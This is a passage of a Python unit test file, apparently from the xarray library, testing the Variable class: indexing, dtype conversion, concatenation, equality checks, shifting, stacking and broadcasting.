def test_index_0d_string(self):
for value, dtype in [('foo', np.dtype('U3' if PY3 else 'S3')),
(u'foo', np.dtype('U3'))]:
x = self.cls(['x'], [value])
self._assertIndexedLikeNDArray(x, value, dtype)
def test_index_0d_datetime(self):
d = datetime(2000, 1, 1)
x = self.cls(['x'], [d])
self._assertIndexedLikeNDArray(x, np.datetime64(d))
x = self.cls(['x'], [np.datetime64(d)])
self._assertIndexedLikeNDArray(x, np.datetime64(d), 'datetime64[ns]')
x = self.cls(['x'], pd.DatetimeIndex([d]))
self._assertIndexedLikeNDArray(x, np.datetime64(d), 'datetime64[ns]')
def test_index_0d_timedelta64(self):
td = timedelta(hours=1)
x = self.cls(['x'], [np.timedelta64(td)])
self._assertIndexedLikeNDArray(x, np.timedelta64(td), 'timedelta64[ns]')
x = self.cls(['x'], pd.to_timedelta([td]))
self._assertIndexedLikeNDArray(x, np.timedelta64(td), 'timedelta64[ns]')
def test_index_0d_not_a_time(self):
d = np.datetime64('NaT', 'ns')
x = self.cls(['x'], [d])
self._assertIndexedLikeNDArray(x, d)
def test_index_0d_object(self):
class HashableItemWrapper(object):
def __init__(self, item):
self.item = item
def __eq__(self, other):
return self.item == other.item
def __hash__(self):
return hash(self.item)
def __repr__(self):
return '%s(item=%r)' % (type(self).__name__, self.item)
item = HashableItemWrapper((1, 2, 3))
x = self.cls('x', [item])
self._assertIndexedLikeNDArray(x, item, expected_dtype=False)
def test_0d_object_array_with_list(self):
listarray = np.empty((1,), dtype=object)
listarray[0] = [1, 2, 3]
x = self.cls('x', listarray)
assert x.data == listarray
assert x[0].data == listarray.squeeze()
assert x.squeeze().data == listarray.squeeze()
def test_index_and_concat_datetime(self):
# regression test for #125
date_range = pd.date_range('2011-09-01', periods=10)
for dates in [date_range, date_range.values,
date_range.to_pydatetime()]:
expected = self.cls('t', dates)
for times in [[expected[i] for i in range(10)],
[expected[i:(i + 1)] for i in range(10)],
[expected[[i]] for i in range(10)]]:
actual = Variable.concat(times, 't')
self.assertEqual(expected.dtype, actual.dtype)
self.assertArrayEqual(expected, actual)
def test_0d_time_data(self):
# regression test for #105
x = self.cls('time', pd.date_range('2000-01-01', periods=5))
expected = np.datetime64('2000-01-01T00Z', 'ns')
self.assertEqual(x[0].values, expected)
def test_datetime64_conversion(self):
times = pd.date_range('2000-01-01', periods=3)
for values, preserve_source in [
(times, True),
(times.values, True),
(times.values.astype('datetime64[s]'), False),
(times.to_pydatetime(), False),
]:
v = self.cls(['t'], values)
self.assertEqual(v.dtype, np.dtype('datetime64[ns]'))
self.assertArrayEqual(v.values, times.values)
self.assertEqual(v.values.dtype, np.dtype('datetime64[ns]'))
same_source = source_ndarray(v.values) is source_ndarray(values)
assert preserve_source == same_source
def test_timedelta64_conversion(self):
times = pd.timedelta_range(start=0, periods=3)
for values, preserve_source in [
(times, True),
(times.values, True),
(times.values.astype('timedelta64[s]'), False),
(times.to_pytimedelta(), False),
]:
v = self.cls(['t'], values)
self.assertEqual(v.dtype, np.dtype('timedelta64[ns]'))
self.assertArrayEqual(v.values, times.values)
self.assertEqual(v.values.dtype, np.dtype('timedelta64[ns]'))
same_source = source_ndarray(v.values) is source_ndarray(values)
assert preserve_source == same_source
def test_object_conversion(self):
data = np.arange(5).astype(str).astype(object)
actual = self.cls('x', data)
self.assertEqual(actual.dtype, data.dtype)
def test_pandas_data(self):
v = self.cls(['x'], pd.Series([0, 1, 2], index=[3, 2, 1]))
self.assertVariableIdentical(v, v[[0, 1, 2]])
v = self.cls(['x'], pd.Index([0, 1, 2]))
self.assertEqual(v[0].values, v.values[0])
def test_pandas_period_index(self):
v = self.cls(['x'], pd.period_range(start='2000', periods=20, freq='B'))
self.assertEqual(v[0], pd.Period('2000', freq='B'))
assert "Period('2000-01-03', 'B')" in repr(v)
def test_1d_math(self):
x = 1.0 * np.arange(5)
y = np.ones(5)
# should we need `.to_base_variable()`?
# probably a break that `+v` changes type?
v = self.cls(['x'], x)
base_v = v.to_base_variable()
# unary ops
self.assertVariableIdentical(base_v, +v)
self.assertVariableIdentical(base_v, abs(v))
self.assertArrayEqual((-v).values, -x)
# binary ops with numbers
self.assertVariableIdentical(base_v, v + 0)
self.assertVariableIdentical(base_v, 0 + v)
self.assertVariableIdentical(base_v, v * 1)
self.assertArrayEqual((v > 2).values, x > 2)
self.assertArrayEqual((0 == v).values, 0 == x)
self.assertArrayEqual((v - 1).values, x - 1)
self.assertArrayEqual((1 - v).values, 1 - x)
# binary ops with numpy arrays
self.assertArrayEqual((v * x).values, x ** 2)
self.assertArrayEqual((x * v).values, x ** 2)
self.assertArrayEqual(v - y, v - 1)
self.assertArrayEqual(y - v, 1 - v)
# verify attributes are dropped
v2 = self.cls(['x'], x, {'units': 'meters'})
self.assertVariableIdentical(base_v, +v2)
# binary ops with all variables
self.assertArrayEqual(v + v, 2 * v)
w = self.cls(['x'], y, {'foo': 'bar'})
self.assertVariableIdentical(v + w, self.cls(['x'], x + y).to_base_variable())
self.assertArrayEqual((v * w).values, x * y)
# something complicated
self.assertArrayEqual((v ** 2 * w - 1 + x).values, x ** 2 * y - 1 + x)
# make sure dtype is preserved (for Index objects)
self.assertEqual(float, (+v).dtype)
self.assertEqual(float, (+v).values.dtype)
self.assertEqual(float, (0 + v).dtype)
self.assertEqual(float, (0 + v).values.dtype)
# check types of returned data
self.assertIsInstance(+v, Variable)
self.assertNotIsInstance(+v, IndexVariable)
self.assertIsInstance(0 + v, Variable)
self.assertNotIsInstance(0 + v, IndexVariable)
def test_1d_reduce(self):
x = np.arange(5)
v = self.cls(['x'], x)
actual = v.sum()
expected = Variable((), 10)
self.assertVariableIdentical(expected, actual)
self.assertIs(type(actual), Variable)
def test_array_interface(self):
x = np.arange(5)
v = self.cls(['x'], x)
self.assertArrayEqual(np.asarray(v), x)
# test patched in methods
self.assertArrayEqual(v.astype(float), x.astype(float))
# think this is a break, that argsort changes the type
self.assertVariableIdentical(v.argsort(), v.to_base_variable())
self.assertVariableIdentical(v.clip(2, 3),
self.cls('x', x.clip(2, 3)).to_base_variable())
# test ufuncs
self.assertVariableIdentical(np.sin(v), self.cls(['x'], np.sin(x)).to_base_variable())
self.assertIsInstance(np.sin(v), Variable)
self.assertNotIsInstance(np.sin(v), IndexVariable)
def example_1d_objects(self):
for data in [range(3),
0.5 * np.arange(3),
0.5 * np.arange(3, dtype=np.float32),
pd.date_range('2000-01-01', periods=3),
np.array(['a', 'b', 'c'], dtype=object)]:
yield (self.cls('x', data), data)
def test___array__(self):
for v, data in self.example_1d_objects():
self.assertArrayEqual(v.values, np.asarray(data))
self.assertArrayEqual(np.asarray(v), np.asarray(data))
self.assertEqual(v[0].values, np.asarray(data)[0])
self.assertEqual(np.asarray(v[0]), np.asarray(data)[0])
def test_equals_all_dtypes(self):
for v, _ in self.example_1d_objects():
v2 = v.copy()
self.assertTrue(v.equals(v2))
self.assertTrue(v.identical(v2))
self.assertTrue(v.no_conflicts(v2))
self.assertTrue(v[0].equals(v2[0]))
self.assertTrue(v[0].identical(v2[0]))
self.assertTrue(v[0].no_conflicts(v2[0]))
self.assertTrue(v[:2].equals(v2[:2]))
self.assertTrue(v[:2].identical(v2[:2]))
self.assertTrue(v[:2].no_conflicts(v2[:2]))
def test_eq_all_dtypes(self):
# ensure that we don't choke on comparisons for which numpy returns
# scalars
expected = Variable('x', 3 * [False])
for v, _ in self.example_1d_objects():
actual = 'z' == v
self.assertVariableIdentical(expected, actual)
actual = ~('z' != v)
self.assertVariableIdentical(expected, actual)
def test_encoding_preserved(self):
expected = self.cls('x', range(3), {'foo': 1}, {'bar': 2})
for actual in [expected.T,
expected[...],
expected.squeeze(),
expected.isel(x=slice(None)),
expected.set_dims({'x': 3}),
expected.copy(deep=True),
expected.copy(deep=False)]:
self.assertVariableIdentical(expected.to_base_variable(),
actual.to_base_variable())
self.assertEqual(expected.encoding, actual.encoding)
def test_concat(self):
x = np.arange(5)
y = np.arange(5, 10)
v = self.cls(['a'], x)
w = self.cls(['a'], y)
self.assertVariableIdentical(Variable(['b', 'a'], np.array([x, y])),
Variable.concat([v, w], 'b'))
self.assertVariableIdentical(Variable(['b', 'a'], np.array([x, y])),
Variable.concat((v, w), 'b'))
self.assertVariableIdentical(Variable(['b', 'a'], np.array([x, y])),
Variable.concat((v, w), 'b'))
with self.assertRaisesRegexp(ValueError, 'inconsistent dimensions'):
Variable.concat([v, Variable(['c'], y)], 'b')
# test indexers
actual = Variable.concat(
[v, w],
positions=[np.arange(0, 10, 2), np.arange(1, 10, 2)],
dim='a')
expected = Variable('a', np.array([x, y]).ravel(order='F'))
self.assertVariableIdentical(expected, actual)
# test concatenating along a dimension
v = Variable(['time', 'x'], np.random.random((10, 8)))
self.assertVariableIdentical(v, Variable.concat([v[:5], v[5:]], 'time'))
self.assertVariableIdentical(v, Variable.concat([v[:5], v[5:6], v[6:]], 'time'))
self.assertVariableIdentical(v, Variable.concat([v[:1], v[1:]], 'time'))
# test dimension order
self.assertVariableIdentical(v, Variable.concat([v[:, :5], v[:, 5:]], 'x'))
with self.assertRaisesRegexp(ValueError, 'all input arrays must have'):
Variable.concat([v[:, 0], v[:, 1:]], 'x')
def test_concat_attrs(self):
# different or conflicting attributes should be removed
v = self.cls('a', np.arange(5), {'foo': 'bar'})
w = self.cls('a', np.ones(5))
expected = self.cls('a', np.concatenate([np.arange(5), np.ones(5)])).to_base_variable()
self.assertVariableIdentical(expected, Variable.concat([v, w], 'a'))
w.attrs['foo'] = 2
self.assertVariableIdentical(expected, Variable.concat([v, w], 'a'))
w.attrs['foo'] = 'bar'
expected.attrs['foo'] = 'bar'
self.assertVariableIdentical(expected, Variable.concat([v, w], 'a'))
def test_concat_fixed_len_str(self):
# regression test for #217
for kind in ['S', 'U']:
x = self.cls('animal', np.array(['horse'], dtype=kind))
y = self.cls('animal', np.array(['aardvark'], dtype=kind))
actual = Variable.concat([x, y], 'animal')
expected = Variable(
'animal', np.array(['horse', 'aardvark'], dtype=kind))
self.assertVariableEqual(expected, actual)
def test_concat_number_strings(self):
# regression test for #305
a = self.cls('x', ['0', '1', '2'])
b = self.cls('x', ['3', '4'])
actual = Variable.concat([a, b], dim='x')
expected = Variable('x', np.arange(5).astype(str).astype(object))
self.assertVariableIdentical(expected, actual)
self.assertEqual(expected.dtype, object)
self.assertEqual(type(expected.values[0]), str)
def test_copy(self):
v = self.cls('x', 0.5 * np.arange(10), {'foo': 'bar'})
for deep in [True, False]:
w = v.copy(deep=deep)
self.assertIs(type(v), type(w))
self.assertVariableIdentical(v, w)
self.assertEqual(v.dtype, w.dtype)
if self.cls is Variable:
if deep:
self.assertIsNot(source_ndarray(v.values),
source_ndarray(w.values))
else:
self.assertIs(source_ndarray(v.values),
source_ndarray(w.values))
self.assertVariableIdentical(v, copy(v))
def test_copy_index(self):
midx = pd.MultiIndex.from_product([['a', 'b'], [1, 2], [-1, -2]],
names=('one', 'two', 'three'))
v = self.cls('x', midx)
for deep in [True, False]:
w = v.copy(deep=deep)
self.assertIsInstance(w._data, PandasIndexAdapter)
self.assertIsInstance(w.to_index(), pd.MultiIndex)
self.assertArrayEqual(v._data.array, w._data.array)
def test_real_and_imag(self):
v = self.cls('x', np.arange(3) - 1j * np.arange(3), {'foo': 'bar'})
expected_re = self.cls('x', np.arange(3), {'foo': 'bar'})
self.assertVariableIdentical(v.real, expected_re)
expected_im = self.cls('x', -np.arange(3), {'foo': 'bar'})
self.assertVariableIdentical(v.imag, expected_im)
expected_abs = self.cls('x', np.sqrt(2 * np.arange(3) ** 2)).to_base_variable()
self.assertVariableAllClose(abs(v), expected_abs)
def test_aggregate_complex(self):
# should skip NaNs
v = self.cls('x', [1, 2j, np.nan])
expected = Variable((), 0.5 + 1j)
self.assertVariableAllClose(v.mean(), expected)
def test_pandas_cateogrical_dtype(self):
data = pd.Categorical(np.arange(10, dtype='int64'))
v = self.cls('x', data)
print(v) # should not error
assert v.dtype == 'int64'
def test_pandas_datetime64_with_tz(self):
data = pd.date_range(start='2000-01-01',
tz=pytz.timezone('America/New_York'),
periods=10, freq='1h')
v = self.cls('x', data)
print(v) # should not error
if 'America/New_York' in str(data.dtype):
# pandas is new enough that it has datetime64 with timezone dtype
assert v.dtype == 'object'
def test_multiindex(self):
idx = pd.MultiIndex.from_product([list('abc'), [0, 1]])
v = self.cls('x', idx)
self.assertVariableIdentical(Variable((), ('a', 0)), v[0])
self.assertVariableIdentical(v, v[:])
def test_load(self):
array = self.cls('x', np.arange(5))
orig_data = array._data
copied = array.copy(deep=True)
array.load()
assert type(array._data) is type(orig_data)
assert type(copied._data) is type(orig_data)
self.assertVariableIdentical(array, copied)
class TestVariable(TestCase, VariableSubclassTestCases):
cls = staticmethod(Variable)
def setUp(self):
self.d = np.random.random((10, 3)).astype(np.float64)
def test_data_and_values(self):
v = Variable(['time', 'x'], self.d)
self.assertArrayEqual(v.data, self.d)
self.assertArrayEqual(v.values, self.d)
self.assertIs(source_ndarray(v.values), self.d)
with self.assertRaises(ValueError):
# wrong size
v.values = np.random.random(5)
d2 = np.random.random((10, 3))
v.values = d2
self.assertIs(source_ndarray(v.values), d2)
d3 = np.random.random((10, 3))
v.data = d3
self.assertIs(source_ndarray(v.data), d3)
def test_numpy_same_methods(self):
v = Variable([], np.float32(0.0))
self.assertEqual(v.item(), 0)
self.assertIs(type(v.item()), float)
v = IndexVariable('x', np.arange(5))
self.assertEqual(2, v.searchsorted(2))
def test_datetime64_conversion_scalar(self):
expected = np.datetime64('2000-01-01T00:00:00Z', 'ns')
for values in [
np.datetime64('2000-01-01T00Z'),
pd.Timestamp('2000-01-01T00'),
datetime(2000, 1, 1),
]:
v = Variable([], values)
self.assertEqual(v.dtype, np.dtype('datetime64[ns]'))
self.assertEqual(v.values, expected)
self.assertEqual(v.values.dtype, np.dtype('datetime64[ns]'))
def test_timedelta64_conversion_scalar(self):
expected = np.timedelta64(24 * 60 * 60 * 10 ** 9, 'ns')
for values in [
np.timedelta64(1, 'D'),
pd.Timedelta('1 day'),
timedelta(days=1),
]:
v = Variable([], values)
self.assertEqual(v.dtype, np.dtype('timedelta64[ns]'))
self.assertEqual(v.values, expected)
self.assertEqual(v.values.dtype, np.dtype('timedelta64[ns]'))
def test_0d_str(self):
v = Variable([], u'foo')
self.assertEqual(v.dtype, np.dtype('U3'))
self.assertEqual(v.values, 'foo')
v = Variable([], np.string_('foo'))
self.assertEqual(v.dtype, np.dtype('S3'))
self.assertEqual(v.values, bytes('foo', 'ascii') if PY3 else 'foo')
def test_0d_datetime(self):
v = Variable([], pd.Timestamp('2000-01-01'))
self.assertEqual(v.dtype, np.dtype('datetime64[ns]'))
self.assertEqual(v.values, np.datetime64('2000-01-01T00Z', 'ns'))
def test_0d_timedelta(self):
for td in [pd.to_timedelta('1s'), np.timedelta64(1, 's')]:
v = Variable([], td)
self.assertEqual(v.dtype, np.dtype('timedelta64[ns]'))
self.assertEqual(v.values, np.timedelta64(10 ** 9, 'ns'))
def test_equals_and_identical(self):
d = np.random.rand(10, 3)
d[0, 0] = np.nan
v1 = Variable(('dim1', 'dim2'), data=d,
attrs={'att1': 3, 'att2': [1, 2, 3]})
v2 = Variable(('dim1', 'dim2'), data=d,
attrs={'att1': 3, 'att2': [1, 2, 3]})
self.assertTrue(v1.equals(v2))
self.assertTrue(v1.identical(v2))
v3 = Variable(('dim1', 'dim3'), data=d)
self.assertFalse(v1.equals(v3))
v4 = Variable(('dim1', 'dim2'), data=d)
self.assertTrue(v1.equals(v4))
self.assertFalse(v1.identical(v4))
v5 = deepcopy(v1)
v5.values[:] = np.random.rand(10, 3)
self.assertFalse(v1.equals(v5))
self.assertFalse(v1.equals(None))
self.assertFalse(v1.equals(d))
self.assertFalse(v1.identical(None))
self.assertFalse(v1.identical(d))
def test_broadcast_equals(self):
v1 = Variable((), np.nan)
v2 = Variable(('x'), [np.nan, np.nan])
self.assertTrue(v1.broadcast_equals(v2))
self.assertFalse(v1.equals(v2))
self.assertFalse(v1.identical(v2))
v3 = Variable(('x'), [np.nan])
self.assertTrue(v1.broadcast_equals(v3))
self.assertFalse(v1.equals(v3))
self.assertFalse(v1.identical(v3))
self.assertFalse(v1.broadcast_equals(None))
v4 = Variable(('x'), [np.nan] * 3)
self.assertFalse(v2.broadcast_equals(v4))
def test_no_conflicts(self):
v1 = Variable(('x'), [1, 2, np.nan, np.nan])
v2 = Variable(('x'), [np.nan, 2, 3, np.nan])
self.assertTrue(v1.no_conflicts(v2))
self.assertFalse(v1.equals(v2))
self.assertFalse(v1.broadcast_equals(v2))
self.assertFalse(v1.identical(v2))
self.assertFalse(v1.no_conflicts(None))
v3 = Variable(('y'), [np.nan, 2, 3, np.nan])
self.assertFalse(v3.no_conflicts(v1))
d = np.array([1, 2, np.nan, np.nan])
self.assertFalse(v1.no_conflicts(d))
self.assertFalse(v2.no_conflicts(d))
v4 = Variable(('w', 'x'), [d])
self.assertTrue(v1.no_conflicts(v4))
def test_as_variable(self):
data = np.arange(10)
expected = Variable('x', data)
expected_extra = Variable('x', data, attrs={'myattr': 'val'},
encoding={'scale_factor': 1})
self.assertVariableIdentical(expected, as_variable(expected))
ds = Dataset({'x': expected})
var = as_variable(ds['x']).to_base_variable()
self.assertVariableIdentical(expected, var)
self.assertNotIsInstance(ds['x'], Variable)
self.assertIsInstance(as_variable(ds['x']), Variable)
FakeVariable = namedtuple('FakeVariable', 'values dims')
fake_xarray = FakeVariable(expected.values, expected.dims)
self.assertVariableIdentical(expected, as_variable(fake_xarray))
FakeVariable = namedtuple('FakeVariable', 'data dims')
fake_xarray = FakeVariable(expected.data, expected.dims)
self.assertVariableIdentical(expected, as_variable(fake_xarray))
FakeVariable = namedtuple('FakeVariable',
'data values dims attrs encoding')
fake_xarray = FakeVariable(expected_extra.data, expected_extra.values,
expected_extra.dims, expected_extra.attrs,
expected_extra.encoding)
self.assertVariableIdentical(expected_extra, as_variable(fake_xarray))
xarray_tuple = (expected_extra.dims, expected_extra.values,
expected_extra.attrs, expected_extra.encoding)
self.assertVariableIdentical(expected_extra, as_variable(xarray_tuple))
with self.assertRaisesRegexp(TypeError, 'tuples to convert'):
as_variable(tuple(data))
with self.assertRaisesRegexp(
TypeError, 'without an explicit list of dimensions'):
as_variable(data)
actual = as_variable(data, name='x')
self.assertVariableIdentical(expected.to_index_variable(), actual)
actual = as_variable(0)
expected = Variable([], 0)
self.assertVariableIdentical(expected, actual)
data = np.arange(9).reshape((3, 3))
expected = Variable(('x', 'y'), data)
with self.assertRaisesRegexp(
ValueError, 'without explicit dimension names'):
as_variable(data, name='x')
with self.assertRaisesRegexp(
ValueError, 'has more than 1-dimension'):
as_variable(expected, name='x')
def test_repr(self):
v = Variable(['time', 'x'], [[1, 2, 3], [4, 5, 6]], {'foo': 'bar'})
expected = dedent("""
<xarray.Variable (time: 2, x: 3)>
array([[1, 2, 3],
[4, 5, 6]])
Attributes:
foo: bar
""").strip()
self.assertEqual(expected, repr(v))
def test_repr_lazy_data(self):
v = Variable('x', LazilyIndexedArray(np.arange(2e5)))
self.assertIn('200000 values with dtype', repr(v))
self.assertIsInstance(v._data, LazilyIndexedArray)
def test_items(self):
data = np.random.random((10, 11))
v = Variable(['x', 'y'], data)
# test slicing
self.assertVariableIdentical(v, v[:])
self.assertVariableIdentical(v, v[...])
self.assertVariableIdentical(Variable(['y'], data[0]), v[0])
self.assertVariableIdentical(Variable(['x'], data[:, 0]), v[:, 0])
self.assertVariableIdentical(Variable(['x', 'y'], data[:3, :2]),
v[:3, :2])
# test array indexing
x = Variable(['x'], np.arange(10))
y = Variable(['y'], np.arange(11))
self.assertVariableIdentical(v, v[x.values])
self.assertVariableIdentical(v, v[x])
self.assertVariableIdentical(v[:3], v[x < 3])
self.assertVariableIdentical(v[:, 3:], v[:, y >= 3])
self.assertVariableIdentical(v[:3, 3:], v[x < 3, y >= 3])
self.assertVariableIdentical(v[:3, :2], v[x[:3], y[:2]])
self.assertVariableIdentical(v[:3, :2], v[range(3), range(2)])
# test iteration
for n, item in enumerate(v):
self.assertVariableIdentical(Variable(['y'], data[n]), item)
with self.assertRaisesRegexp(TypeError, 'iteration over a 0-d'):
iter(Variable([], 0))
# test setting
v.values[:] = 0
self.assertTrue(np.all(v.values == 0))
# test orthogonal setting
v[range(10), range(11)] = 1
self.assertArrayEqual(v.values, np.ones((10, 11)))
def test_isel(self):
v = Variable(['time', 'x'], self.d)
self.assertVariableIdentical(v.isel(time=slice(None)), v)
self.assertVariableIdentical(v.isel(time=0), v[0])
self.assertVariableIdentical(v.isel(time=slice(0, 3)), v[:3])
self.assertVariableIdentical(v.isel(x=0), v[:, 0])
with self.assertRaisesRegexp(ValueError, 'do not exist'):
v.isel(not_a_dim=0)
def test_index_0d_numpy_string(self):
# regression test to verify our work around for indexing 0d strings
v = Variable([], np.string_('asdf'))
self.assertVariableIdentical(v[()], v)
v = Variable([], np.unicode_(u'asdf'))
self.assertVariableIdentical(v[()], v)
def test_indexing_0d_unicode(self):
# regression test for GH568
actual = Variable(('x'), [u'tmax'])[0][()]
expected = Variable((), u'tmax')
self.assertVariableIdentical(actual, expected)
def test_shift(self):
v = Variable('x', [1, 2, 3, 4, 5])
self.assertVariableIdentical(v, v.shift(x=0))
self.assertIsNot(v, v.shift(x=0))
expected = Variable('x', [np.nan, 1, 2, 3, 4])
self.assertVariableIdentical(expected, v.shift(x=1))
expected = Variable('x', [np.nan, np.nan, 1, 2, 3])
self.assertVariableIdentical(expected, v.shift(x=2))
expected = Variable('x', [2, 3, 4, 5, np.nan])
self.assertVariableIdentical(expected, v.shift(x=-1))
expected = Variable('x', [np.nan] * 5)
self.assertVariableIdentical(expected, v.shift(x=5))
self.assertVariableIdentical(expected, v.shift(x=6))
with self.assertRaisesRegexp(ValueError, 'dimension'):
v.shift(z=0)
v = Variable('x', [1, 2, 3, 4, 5], {'foo': 'bar'})
self.assertVariableIdentical(v, v.shift(x=0))
expected = Variable('x', [np.nan, 1, 2, 3, 4], {'foo': 'bar'})
self.assertVariableIdentical(expected, v.shift(x=1))
def test_shift2d(self):
v = Variable(('x', 'y'), [[1, 2], [3, 4]])
expected = Variable(('x', 'y'), [[np.nan, np.nan], [np.nan, 1]])
self.assertVariableIdentical(expected, v.shift(x=1, y=1))
def test_roll(self):
v = Variable('x', [1, 2, 3, 4, 5])
self.assertVariableIdentical(v, v.roll(x=0))
self.assertIsNot(v, v.roll(x=0))
expected = Variable('x', [5, 1, 2, 3, 4])
self.assertVariableIdentical(expected, v.roll(x=1))
self.assertVariableIdentical(expected, v.roll(x=-4))
self.assertVariableIdentical(expected, v.roll(x=6))
expected = Variable('x', [4, 5, 1, 2, 3])
self.assertVariableIdentical(expected, v.roll(x=2))
self.assertVariableIdentical(expected, v.roll(x=-3))
with self.assertRaisesRegexp(ValueError, 'dimension'):
v.roll(z=0)
def test_roll_consistency(self):
v = Variable(('x', 'y'), np.random.randn(5, 6))
for axis, dim in [(0, 'x'), (1, 'y')]:
for shift in [-3, 0, 1, 7, 11]:
expected = np.roll(v.values, shift, axis=axis)
actual = v.roll(**{dim: shift}).values
self.assertArrayEqual(expected, actual)
def test_transpose(self):
v = Variable(['time', 'x'], self.d)
v2 = Variable(['x', 'time'], self.d.T)
self.assertVariableIdentical(v, v2.transpose())
self.assertVariableIdentical(v.transpose(), v.T)
x = np.random.randn(2, 3, 4, 5)
w = Variable(['a', 'b', 'c', 'd'], x)
w2 = Variable(['d', 'b', 'c', 'a'], np.einsum('abcd->dbca', x))
self.assertEqual(w2.shape, (5, 3, 4, 2))
self.assertVariableIdentical(w2, w.transpose('d', 'b', 'c', 'a'))
self.assertVariableIdentical(w, w2.transpose('a', 'b', 'c', 'd'))
w3 = Variable(['b', 'c', 'd', 'a'], np.einsum('abcd->bcda', x))
self.assertVariableIdentical(w, w3.transpose('a', 'b', 'c', 'd'))
def test_transpose_0d(self):
for value in [
3.5,
('a', 1),
np.datetime64('2000-01-01'),
np.timedelta64(1, 'h'),
None,
object(),
]:
variable = Variable([], value)
actual = variable.transpose()
assert actual.identical(variable)
def test_squeeze(self):
v = Variable(['x', 'y'], [[1]])
self.assertVariableIdentical(Variable([], 1), v.squeeze())
self.assertVariableIdentical(Variable(['y'], [1]), v.squeeze('x'))
self.assertVariableIdentical(Variable(['y'], [1]), v.squeeze(['x']))
self.assertVariableIdentical(Variable(['x'], [1]), v.squeeze('y'))
self.assertVariableIdentical(Variable([], 1), v.squeeze(['x', 'y']))
v = Variable(['x', 'y'], [[1, 2]])
self.assertVariableIdentical(Variable(['y'], [1, 2]), v.squeeze())
self.assertVariableIdentical(Variable(['y'], [1, 2]), v.squeeze('x'))
with self.assertRaisesRegexp(ValueError, 'cannot select a dimension'):
v.squeeze('y')
def test_get_axis_num(self):
v = Variable(['x', 'y', 'z'], np.random.randn(2, 3, 4))
self.assertEqual(v.get_axis_num('x'), 0)
self.assertEqual(v.get_axis_num(['x']), (0,))
self.assertEqual(v.get_axis_num(['x', 'y']), (0, 1))
self.assertEqual(v.get_axis_num(['z', 'y', 'x']), (2, 1, 0))
with self.assertRaisesRegexp(ValueError, 'not found in array dim'):
v.get_axis_num('foobar')
def test_set_dims(self):
v = Variable(['x'], [0, 1])
actual = v.set_dims(['x', 'y'])
expected = Variable(['x', 'y'], [[0], [1]])
self.assertVariableIdentical(actual, expected)
actual = v.set_dims(['y', 'x'])
self.assertVariableIdentical(actual, expected.T)
actual = v.set_dims(OrderedDict([('x', 2), ('y', 2)]))
expected = Variable(['x', 'y'], [[0, 0], [1, 1]])
self.assertVariableIdentical(actual, expected)
v = Variable(['foo'], [0, 1])
actual = v.set_dims('foo')
expected = v
self.assertVariableIdentical(actual, expected)
with self.assertRaisesRegexp(ValueError, 'must be a superset'):
v.set_dims(['z'])
def test_set_dims_object_dtype(self):
v = Variable([], ('a', 1))
actual = v.set_dims(('x',), (3,))
exp_values = np.empty((3,), dtype=object)
for i in range(3):
exp_values[i] = ('a', 1)
expected = Variable(['x'], exp_values)
assert actual.identical(expected)
def test_stack(self):
v = Variable(['x', 'y'], [[0, 1], [2, 3]], {'foo': 'bar'})
actual = v.stack(z=('x', 'y'))
expected = Variable('z', [0, 1, 2, 3], v.attrs)
self.assertVariableIdentical(actual, expected)
actual = v.stack(z=('x',))
expected = Variable(('y', 'z'), v.data.T, v.attrs)
self.assertVariableIdentical(actual, expected)
actual = v.stack(z=(),)
self.assertVariableIdentical(actual, v)
actual = v.stack(X=('x',), Y=('y',)).transpose('X', 'Y')
expected = Variable(('X', 'Y'), v.data, v.attrs)
self.assertVariableIdentical(actual, expected)
def test_stack_errors(self):
v = Variable(['x', 'y'], [[0, 1], [2, 3]], {'foo': 'bar'})
with self.assertRaisesRegexp(ValueError, 'invalid existing dim'):
v.stack(z=('x1',))
with self.assertRaisesRegexp(ValueError, 'cannot create a new dim'):
v.stack(x=('x',))
def test_unstack(self):
v = Variable('z', [0, 1, 2, 3], {'foo': 'bar'})
actual = v.unstack(z=OrderedDict([('x', 2), ('y', 2)]))
expected = Variable(('x', 'y'), [[0, 1], [2, 3]], v.attrs)
self.assertVariableIdentical(actual, expected)
actual = v.unstack(z=OrderedDict([('x', 4), ('y', 1)]))
expected = Variable(('x', 'y'), [[0], [1], [2], [3]], v.attrs)
self.assertVariableIdentical(actual, expected)
actual = v.unstack(z=OrderedDict([('x', 4)]))
expected = Variable('x', [0, 1, 2, 3], v.attrs)
self.assertVariableIdentical(actual, expected)
def test_unstack_errors(self):
v = Variable('z', [0, 1, 2, 3])
with self.assertRaisesRegexp(ValueError, 'invalid existing dim'):
v.unstack(foo={'x': 4})
with self.assertRaisesRegexp(ValueError, 'cannot create a new dim'):
v.stack(z=('z',))
with self.assertRaisesRegexp(ValueError, 'the product of the new dim'):
v.unstack(z={'x': 5})
def test_unstack_2d(self):
v = Variable(['x', 'y'], [[0, 1], [2, 3]])
actual = v.unstack(y={'z': 2})
expected = Variable(['x', 'z'], v.data)
self.assertVariableIdentical(actual, expected)
actual = v.unstack(x={'z': 2})
expected = Variable(['y', 'z'], v.data.T)
self.assertVariableIdentical(actual, expected)
def test_stack_unstack_consistency(self):
v = Variable(['x', 'y'], [[0, 1], [2, 3]])
actual = (v.stack(z=('x', 'y'))
.unstack(z=OrderedDict([('x', 2), ('y', 2)])))
self.assertVariableIdentical(actual, v)
def test_broadcasting_math(self):
x = np.random.randn(2, 3)
v = Variable(['a', 'b'], x)
# 1d to 2d broadcasting
self.assertVariableIdentical(
v * v,
Variable(['a', 'b'], np.einsum('ab,ab->ab', x, x)))
self.assertVariableIdentical(
v * v[0],
Variable(['a', 'b'], np.einsum('ab,b->ab', x, x[0])))
self.assertVariableIdentical(
v[0] * v,
Variable(['b', 'a'], np.einsum('b,ab->ba', x[0], x)))
self.assertVariableIdentical(
v[0] * v[:, 0],
Variable(['b', 'a'], np.einsum('b,a->ba', x[0], x[:, 0])))
# higher dim broadcasting
y = np.random.randn(3, 4, 5)
w = Variable(['b', 'c', 'd'], y)
self.assertVariableIdentical(
v * w, Variable(['a', 'b', 'c', 'd'],
np.einsum('ab,bcd->abcd', x, y)))
self.assertVariableIdentical(
w * v, Variable(['b', 'c', 'd', 'a'],
np.einsum('bcd,ab->bcda', y, x)))
self.assertVariableIdentical(
v * w[0], Variable(['a', 'b', 'c', 'd'],
np.einsum('ab,cd->abcd', x, y[0])))
def test_broadcasting_failures(self):
a = Variable(['x'], np.arange(10))
b = Variable(['x'], np.arange(5))
c = Variable(['x', 'x'], np.arange(100).reshape(10, 10))
with self.assertRaisesRegexp(ValueError, 'mismatched lengths'):
a + b
with self.assertRaisesRegexp(ValueError, 'duplicate dimensions'):
a + c
def test_inplace_math(self):
x = np.arange(5)
v = Variable(['x'], x)
